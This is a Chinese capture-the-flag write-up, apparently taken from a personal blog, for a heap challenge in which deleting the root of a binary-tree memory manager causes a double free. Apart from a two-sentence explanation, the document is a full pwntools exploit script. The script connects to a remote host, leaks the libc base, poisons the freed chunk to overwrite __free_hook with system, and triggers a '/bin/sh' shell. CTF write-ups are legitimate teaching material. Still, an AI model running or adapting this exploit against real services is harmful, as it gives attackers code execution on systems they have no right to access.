点击此处获得更好的阅读体验
WriteUp来源
来自Eqqie的博客
题目描述
Vulnerable data manager. Try to exploit!
题目考点
- Double Free
解题思路
用二叉树管理内存的堆题,特定条件下删根节点会double free。
伪代码看的我血压升高,直接调确定一种情况比如根节点有左右节点,且右节点有两个叶子。这样free掉根节点时会出现loop chain。慢慢利用就行。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59from pwn import *
#p = process("./chall", env={"LD_PRELOAD":"./libc-2.27.so"})
p = remote("47.105.94.48", 12243)
libc = ELF("./libc-2.27.so")
context.arch = "amd64"
context.log_level = "debug"
# header: 0x555555554000+0x202018
def add(key:int, length:int, content):
p.sendlineafter(b"> ", b"1")
p.sendlineafter(b"key> ", str(key).encode())
p.sendlineafter(b"len> ", str(length).encode())
p.sendafter(b"content> ", content)
def delete(key:int):
p.sendlineafter(b"> ", b"2")
p.sendlineafter(b"key> ", str(key).encode())
def show():
p.sendlineafter(b"> ", b"3")
def exp():
# leak libc
add(1, 0x420, b"unsorted")
add(2, 0x420, b"unsorted2")
delete(1)
delete(2)
add(5, 0x10, b"5"*8)
show()
p.recvuntil(b"55555555")
libc_leak = u64(p.recvuntil(b"\x0a", drop=True).ljust(8, b"\x00"))
libc_base = libc_leak - 0x3ec090
system = libc_base + libc.symbols[b"system"]
free_hook = libc_base + libc.symbols[b"__free_hook"]
print("libc_leak:", hex(libc_leak))
print("libc_base:", hex(libc_base))
print("system:", hex(system))
# build double free
add(7, 0x10, b"7"*8)
add(6, 0x10, b"6"*8)
add(4, 0x10, b"4"*8)
add(8, 0x10, b"8"*8)
delete(8)
delete(5)
add(10, 0x10, p64(free_hook))
add(11, 0x10, b"/bin/sh\x00")
add(12, 0x10, p64(system))
print("free_hook:", hex(free_hook))
delete(11)
#gdb.attach(p)
p.interactive()
if __name__ == "__main__":
exp()